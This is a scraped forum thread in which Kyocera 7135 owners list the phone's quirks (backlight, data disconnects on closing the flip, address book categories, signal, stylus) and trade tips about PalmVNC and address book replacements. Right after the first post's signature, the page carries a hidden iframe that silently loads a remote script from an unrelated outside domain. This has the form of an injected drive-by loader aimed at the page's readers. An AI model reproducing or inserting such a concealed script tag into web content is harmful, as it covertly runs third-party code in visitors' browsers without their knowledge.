+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

What don't I like about my 7135?

There are a few quirks that it is taking me some time to get used to. Nothing that can't be fixed in software though:

1: I can turn off the palm, by tapping the backlight key. When I tap it again to turn on, it comes on, then within a second or so, the backlight turns off. The screen is nearly invisible wihtout the backlight on, so I then need to hold down the backlight key to turn it back on again. There really is no point to having the screen on without the backlight, so I would have preferred that it work the same as the PalmIIIc and just turn the palm on and off, and always have the backlight on when the palm is on. The workaround is to turn it off by using the backlight button, but turn it back on with the OK button. That works fine, I just need to remember to do it.

2: If I am on express network, and want to stay on (in dormant mode), I can't close the flip, or it disconnects me. This makes sense since you should be able to hang up on voice calls by closing the flip, but I wish it would differentiate between the two and not disconnect the data. Doesn't take too long to log back on, but if I am using something interactive like AIM or ICQ, but want to walk around until I receive a message, it is a pain to need to keep the phone open.

3: If I am dorment too long, or lose my express network connection for some other reason, the LCD and phone application indicate that I missed a call from "unknown" rather then that the data connection was lost. This really freaked me out the first couple of times I saw it, but now that I realize what is happening, it is no big deal.

4: Address Book integration. There are a few minor problems here. Every time I place or receive a call, it sets the address book back to the "ALL" catagory. I guess this happenbs becuase it seraches the address book for a callerID match, but it is a minor irritation. The bigger issue is that the applications which tightly integrate with the address book, like the speed dial, voice dial, or message application do not allow you to select names by catagory. They always display the whole list, so I always need to start entering the name and search, rather then simply scrolling within a catagory (my address book has 2099 entires, so it takes a while to scroll....).

5: Although I am not having the kind of signal problems Cloudy1 reported, I do not appear to be getting as strong a signal as my old StarTac 7868 did. I know you can't really trust the visual signal strength display, but I have had the phone go into "searching" mode a few times. The StarTac would also occasionally do this, but it seemed more willing to flip over to analog instead of keep searching for a digital signal.

Too bad I didn't have an opportunity to Beta test, because these are all (well, maybe not the address book stuff) the kinds of things that are probably fixed with just a few lines of code. I'll submit these observations to Kyo tech support anyway, maybe some fixes will be incorporated in firmware/software updates.

So far, everything else about the phone is far better then I even expected. I am very impressed with the quality of the construction, the software, and the application integration. Very glad I chose to be an early adopter.

Alan<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: What don't I like about my 7135?

Originally posted by alanb
    There are a few quirks that it is taking me some time to get used to. Nothing that can't be fixed in software though:

5: Although I am not having the kind of signal problems Cloudy1 reported, I do not appear to be getting as strong a signal as my old StarTac 7868 did. I know you can't really trust the visual signal strength display, but I have had the phone go into "searching" mode a few times. The StarTac would also occasionally do this, but it seemed more willing to flip over to analog instead of keep searching for a digital signal.

Too bad I didn't have an opportunity to Beta test, because these are all (well, maybe not the address book stuff) the kinds of things that are probably fixed with just a few lines of code. I'll submit these observations to Kyo tech support anyway, maybe some fixes will be incorporated in firmware/software updates.

So far, everything else about the phone is far better then I even expected. I am very impressed with the quality of the construction, the software, and the application integration. Very glad I chose to be an early adopter.

Alan
    maybe this is why Verizon is holding off?

audio_*****
    Audio_***** :)
    6035-7135-Treo 650

Two more...

Two more items...

1) It seems that the 33 mhz processor really does inhibit some things. As HotSync has poointed out, it doesn;t acutally effec the ability to use high speed data, but it does slow down the screen painting to the point that EIS is not significantly better on graffics intensive web sites when using express network then using QNC.

One the other hand, when I connect the 7135 to my laptop as a modem, it is as fast as my 144K IDSL. Since this was my real reason for express network, I am still quite pleased.

Also, PalmVNC absolutley rocks over express network.

2) The stylus is just too short and too lightweight. I could live with the length if it had some heft to it, but I am just not comfortable using it for any length of time. I hope someone comes up with a 3rd party one that can fit in the phone, but is heavier (and/or, as DWDOD has suggested, telescoping to make it longer when in use).

alan

And one more

This really is the last one....

If I turn off system sounds (because I hate the little click every time I touch something on the screen....) I can't have a sound when I open the flip...

In regards to #4, try going to options>preferences in address book and choose "rember last categoty"

On a seperate note, what is PalmVNC?

Originally posted by dgelfuso
    In regards to #4, try going to options>preferences in address book and choose "rember last categoty"

On a seperate note, what is PalmVNC?
    DOH!.... That fixed it. Thanks.

PalmVNC is a Palm version of VNC and is used for remote control of a PC. I can view and interact with my home computer desktop via the Palm and Express network.

See: http://www.btinternet.com/~harakan/PalmVNC/

alan, I don't have Express Network so i don't know if this will impact your connection. do you have the check box of answer call checked in flip settings? You could try unchecking or checking to see if this impacts the trigger for disconnect.

4: Address Book integration. There are a few minor problems here. Every time I place or receive a call, it sets the address book back to the "ALL" catagory. I guess this happenbs becuase it seraches the address book for a callerID match, but it is a minor irritation. The bigger issue is that the applications which tightly integrate with the address book, like the speed dial, voice dial, or message application do not allow you to select names by catagory. They always display the whole list, so I always need to start entering the name and search, rather then simply scrolling within a catagory (my address book has 2099 entires, so it takes a while to scroll....).

Speaking of address book integration....

This doesn't seem to be working for some numbers on my phone. I tested it at work and called my 7135 from a desk phone I had entered with a name in my address book. The desk phone number displayed on the LCD and main screen, but the address book name did not display. Interestingly, when I look in the recent calls list it does have the name, rather than the phone number. What gives?

Hope this helps

1. You may want to try the backlight utility that was made for the palm M05. Not sure if it will work for the 7135, but you can give it a shot. It is attached and will keep the backlight on all the time.

4. I see that you already fixed this one... but i do want to ask why in the world are you still using the basic address book? There are many advanced replacements that will help you out alot since you have so many contacts. Namely, Super Names by standalone software. Has color coding for different categoreies, sort by any field. unlimited number of addresses and phone numbers per contact, linking contacts together and MANY MANY other features... ok i'm off my soap box.

Good luck and let me know if the backlight utility works...
    Attached Files
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

I've really only got three.

1. When i turn the phone on the Main Menu appears. I'd like to be able to go directly into the palm when the phone turns on.

2. I echo alan's comment about backlight but I've gotten used to it

3. I've never owned an MP3 player before but the player interface seems a little weak. I'm comparing it to the Windows Media Player I use at work which allows me to browse by album, artist etc.

4. Its been awhile since I've had my 6035 but it seems like they split the preferences up into two sections. I'm constantly going into the wrong icon to change settings.

5. I use launcher and the initial screen draw has a slight delay that I don't remember with my 6035.

Ok, enough with the negative.
    The form factor rocks. The screen is absolutely beautiful even with the screen protector. Despite much debate the jog dial is much better situated.

Oops that would be 5

Will Super Names work ok if using pocketmirror to sync with Outlook

Originally posted by pdageek
    alan, I don't have Express Network so i don't know if this will impact your connection. do you have the check box of answer call checked in flip settings? You could try unchecking or checking to see if this impacts the trigger for disconnect.
    Tried that. no difference, but thanks.

Alan

Re: Hope this helps

Originally posted by Byrd Dog
    1. You may want to try the backlight utility that was made for the palm M05. Not sure if it will work for the 7135, but you can give it a shot. It is attached and will keep the backlight on all the time.

4. I see that you already fixed this one... but i do want to ask why in the world are you still using the basic address book? There are many advanced replacements that will help you out alot since you have so many contacts. Namely, Super Names by stanalone software. Has color coding for different categoreies, sort by any field. unlimited number of addresses and phone numbers per contact, linking contacts together and MANY MANY other features... ok i'm off my soap box.

Good luck and let me know if the backlight utility works...
    Thanks for the backlight utility. I will give it a try.

I was planning on looking at TealPhone, but I wasn't sure if it would support dialing from the address book, or if it would need an upgrade. Sort of just looking around to see what is out there.

Alan

dgelfuso,
    Super Names just uses the standard palm address book database. All of the advanced features for the additional addresses and links and such are only visibile within Supernames. You will still be able to see only the first address within outlook. But to answer your question, yes it does work.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

I am intrigued by the PalmVNC application you mentioned. I visited the website. If I understand this correctly, you are able to visit your home PC from anywhere using your 7135 and Express Network, operate your home PC remotely, see its screen and control it with just your 7135? That's amazing! I'd imagine that would use up a lot of bandwidth so you must have the unlimited data Express plan?

Yes.... Palm VNC is sweet!

Alan.... The only thing I don't like about your 7135 is that it's not MINE!
    Please visit my picture site: Robert-O-Rama :)

THe issues you are seeing are nothing. Compares these to the issues the 6035 had for months before they were resolved in many software builds.

All in all, this unit is solid in it's current state. You can't please all the people all the time Hell, I wish my car could fly, but I didn't pay the price of perfection LOL

Originally posted by HoTSynC
    THe issues you are seeing are nothing. Compares these to the issues the 6035 had for months before they were resolved in many software builds.

All in all, this unit is solid in it's current state. You can't please all the people all the time Hell, I wish my car could fly, but I didn't pay the price of perfection LOL
    Oh, I absolutly agree that these problems are all very minor, and overall i think the phone is great. Today, both Dave and Robert asked me if I had found any problems or anything I didn't like, so I thought others on the board would also be curious about the minor quirkiness I saw...

Alan

oh, im in love with the phone! after having held it several times...... its simply awesome!
    Please visit my picture site: Robert-O-Rama :)